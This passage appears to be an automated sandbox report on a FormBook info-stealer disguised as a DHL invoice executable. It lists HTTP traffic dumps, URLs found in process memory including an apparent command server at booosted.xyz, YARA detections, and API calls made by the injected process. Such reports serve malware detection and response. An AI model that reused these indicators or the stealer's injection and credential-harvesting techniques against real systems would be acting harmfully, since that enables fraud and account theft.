54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sun, 17 Nov 2024 07:37:17 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sun, 17 Nov 2024 07:37:19 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 17 Nov 2024 07:37:26 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 17 Nov 2024 07:37:28 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 17 Nov 2024 07:37:31 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 17 Nov 2024 07:37:33 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: wextract.exe, 0000000D.00000002.4141477691.000000000569C000.00000004.10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002.4140437478.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
            Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
            Source: rQkTBkrqhGpTBn.exe, 0000000E.00000002.4142164546.00000000053F1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.booosted.xyz
            Source: rQkTBkrqhGpTBn.exe, 0000000E.00000002.4142164546.00000000053F1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.booosted.xyz/ndw1/
            Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: wextract.exe, 0000000D.00000002.4141477691.00000000051E6000.00000004.10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002.4140437478.00000000034A6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://domaincntrol.com/?orighost=
            Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: wextract.exe, 0000000D.00000002.4139514530.0000000000716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: wextract.exe, 0000000D.00000002.4139514530.0000000000716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: wextract.exe, 0000000D.00000002.4139514530.0000000000716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: wextract.exe, 0000000D.00000002.4139514530.0000000000716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: wextract.exe, 0000000D.00000002.4139514530.0000000000716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: wextract.exe, 0000000D.00000002.4139514530.0000000000716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: wextract.exe, 0000000D.00000003.2250390575.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: wextract.exe, 0000000D.00000002.4141477691.00000000051E6000.00000004.10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002.4140437478.00000000034A6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://nojs.domaincntrol.com
            Source: wextract.exe, 0000000D.00000002.4141477691.000000000619A000.00000004.10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002.4140437478.000000000445A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wa.me/94760523025?text=Hi
            Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: wextract.exe, 0000000D.00000002.4141477691.000000000619A000.00000004.10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002.4140437478.000000000445A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-NF7P1YH6NR

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.4142164546.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4140267279.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2075004528.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4140287170.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2075245562.0000000005A60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 4.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.4142164546.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.4140267279.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2075004528.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.4140287170.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2075245562.0000000005A60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Uses regedit.exe to modify the Windows registry
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0042C663 NtClose,4_2_0042C663
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0040AD68 NtDelayExecution,4_2_0040AD68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_05782DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_05782C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782B60 NtClose,LdrInitializeThunk,4_2_05782B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057835C0 NtCreateMutant,LdrInitializeThunk,4_2_057835C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05784650 NtSuspendThread,4_2_05784650
